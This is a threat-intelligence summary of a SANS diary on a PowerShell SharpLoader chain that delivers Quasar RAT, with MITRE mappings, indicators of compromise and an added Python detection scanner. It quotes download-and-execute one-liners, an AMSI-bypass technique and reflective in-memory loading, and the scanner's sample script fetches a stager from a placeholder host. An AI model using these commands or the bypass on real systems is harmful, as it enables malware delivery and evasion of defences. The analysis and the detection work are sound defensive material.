Quasar RAT Delivered Through Updated SharpLoader

SharpLoader is a very old project that loads and decompresses a C# payload from a remote server or local file to execute it. The article details a PowerShell-based chain that bypasses AMSI, downloads stage payloads, decrypts and loads a Quasar RAT in memory, and provides context on the loader’s origins and technical specifics. Hashtags: #QuasarRAT #SharpLoader #AMSIBypass #PowerShell #Stager

Keypoints

  • SharpLoader is an old project that loads and decompresses a C# payload from a remote web server or a local file to execute it.
  • A PowerShell-based version exists and uses AMSI bypass techniques to evade detection.
  • The loader chain downloads a second PowerShell payload from a remote URL and executes it via IEX.
  • The final stage loads a DLL in memory (not on disk) and runs the Quasar RAT payload.

MITRE Techniques

  • [T1562.001] Impair Defenses – Hooked AMSI (AmsiScanBuffer) to always return S_OK, bypassing malware detection. Quote: ‘hook the function AmsiScanBuffer(). Basically, it will always return “S_OK” meaning that the code is not malicious.’
  • [T1059.001] PowerShell – Uses PowerShell to download and execute remote payloads (IEX and downloadstring). Quote: ‘IEX ((new-object net.webclient).downloadstring(‘$uri’))’ and ‘(New-Object Net.WebClient).DownloadString(‘…’) | IEX’
  • [T1105] Ingress Tool Transfer – Downloads subsequent stage payloads from a remote URL and executes them. Quote: ‘The script downloads and executes a second PowerShell payload:’
  • [T1055] Process Injection – In-memory loading and execution of a .NET DLL via Reflection. Quote: ‘[Reflection.Assembly]::Load([Convert]::FromBase64String(“TVqQAAMAAAAEA…”)) | Out-Null [SharpLoader.Program]::Main(…)’
  • [T1027] Obfuscated/Compressed Files and Information – Base64-encoded payload (starts with “TVqQAAM”) and in-memory decrypt/decode steps. Quote: ‘There is some “magic” to decrypt the payload. You can see a Base64-encoded payload starting with “TVqQAAM”.’
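The four behaviours mapped above (download-and-execute via IEX, reflective assembly loading, a Base64 blob that decodes to an MZ image, and a reference to AmsiScanBuffer) are all visible in the script text itself, so a defender can flag them in PowerShell ScriptBlock logs or quarantined `.ps1` files before anything executes. The following scanner is an added example written for this summary; it is not code from the ISC diary, from SharpLoader, or from Quasar. The rule names, the regexes, the `triage()` helper and the sample script are all assumptions of this example, and the embedded "PE" is a constructed 64-byte stand-in (MZ header plus zero padding), not the real `Client-built0.enc`.

```python
import base64
import binascii
import re

# Detection rules derived from the behaviours the diary describes. Each entry is
# (rule name, MITRE technique as listed on the page, regex over the script text).
# The regexes are this example's own heuristics, not signatures from any vendor.
RULES = [
    ("download_and_execute", "T1059.001/T1105",
     re.compile(r"(?:iex|invoke-expression)[\s\S]{0,200}?downloadstring"
                r"|downloadstring[\s\S]{0,200}?\|\s*iex", re.I)),
    ("reflective_assembly_load", "T1055",
     re.compile(r"\[?reflection\.assembly\]?::load\s*\(", re.I)),
    ("base64_decode_call", "T1027",
     re.compile(r"\[convert\]::frombase64string", re.I)),
    ("amsi_scanbuffer_reference", "T1562.001",
     re.compile(r"amsiscanbuffer", re.I)),
]

# Any run of 40+ Base64 characters is a candidate embedded blob.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def find_embedded_pe_blobs(text):
    """Return (offset, decoded_size) for every Base64 run that decodes to an MZ header.

    The diary notes the payload starts with "TVqQAAM"; decoding and checking for
    b"MZ" is more robust than matching that prefix, since any leading bytes
    before the image would shift the Base64 alphabet.
    """
    hits = []
    for m in BASE64_BLOB.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid Base64 (bad length or padding): skip it
        if decoded.startswith(b"MZ"):
            hits.append((m.start(), len(decoded)))
    return hits


def scan_script(text):
    """Run every rule plus the embedded-PE check and return a list of findings."""
    findings = []
    for name, technique, pattern in RULES:
        m = pattern.search(text)
        if m:
            snippet = m.group(0)[:60].replace("\n", " ")
            findings.append({"rule": name, "technique": technique, "snippet": snippet})
    for offset, size in find_embedded_pe_blobs(text):
        findings.append({"rule": "embedded_pe_base64", "technique": "T1027",
                         "snippet": f"MZ image, {size} bytes decoded, at offset {offset}"})
    return findings


def triage(text):
    """Summarise which rules fired and whether the full stager->loader chain is present."""
    findings = scan_script(text)
    fired = {f["rule"] for f in findings}
    # The chain the diary describes: fetch-and-run, then reflectively load an
    # embedded image. All three together are far more specific than any one alone.
    loader_chain = {"download_and_execute", "reflective_assembly_load", "embedded_pe_base64"}
    return {
        "rules_fired": sorted(fired),
        "loader_chain_matched": loader_chain.issubset(fired),
        "finding_count": len(findings),
    }


# Constructed sample input modelled on the fragments quoted in the diary.
# FAKE_PE_B64 is a stand-in MZ header, not the real payload.
FAKE_PE_B64 = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode()
SAMPLE_SCRIPT = (
    "IEX ((new-object net.webclient).downloadstring('http://example.invalid/stager.ps1'))\n"
    f'[Reflection.Assembly]::Load([Convert]::FromBase64String("{FAKE_PE_B64}")) | Out-Null\n'
    '[SharpLoader.Program]::Main("Client-built0.enc")\n'
)
# A benign admin one-liner, to show the rules do not fire on ordinary scripts.
BENIGN_SCRIPT = "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB | Format-Table\n"

if __name__ == "__main__":
    for label, script in (("sample loader", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, triage(script))
```

In practice the input would be the `ScriptBlockText` field of PowerShell event 4104 or a file pulled from quarantine; `triage()` gives a quick verdict while `scan_script()` keeps the per-rule snippets for the analyst. Note that the AMSI rule did not fire on the sample because the bypass lives in the earlier stager the diary quotes, not in the final loader line, which is exactly why scanning each stage as it is logged matters.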

Indicators of Compromise

  • [IP Address] 193.161.193.99:58530 – C2 server referenced in the Quasar config.
  • [IP Address] 5.206.224.58 – Hosting/loading infrastructure used for stage payloads (URLs shown in the article).
  • [SHA256] caf572b1ea51e044b92d1e37c6ee9f8bf4dd178cf6c71cff5a3527c7870a397b – Quasar RAT final payload hash.
  • [File] SC_Loader_rat.ps1 – PowerShell stage file used in the loader chain.
  • [File] stager_SC_Loader_rat.ps1 – Stage 2 loader script.
  • [File] MODULS/SC_Loader_rat0.ps1 – Stage 2 module loader script.
  • [File] Client-built0.enc – Encrypted/encoded DLL payload loaded into memory.
  • [URL] hxxp://5[.]206[.]224[.]58/MGQ3YTFjZDVkMjI5OTEzMj/uploads/STAGERS/stager_SC_Loader_rat.ps1 – Original URL for the first stage payload download.

Read more: https://isc.sans.edu/diary/rss/30414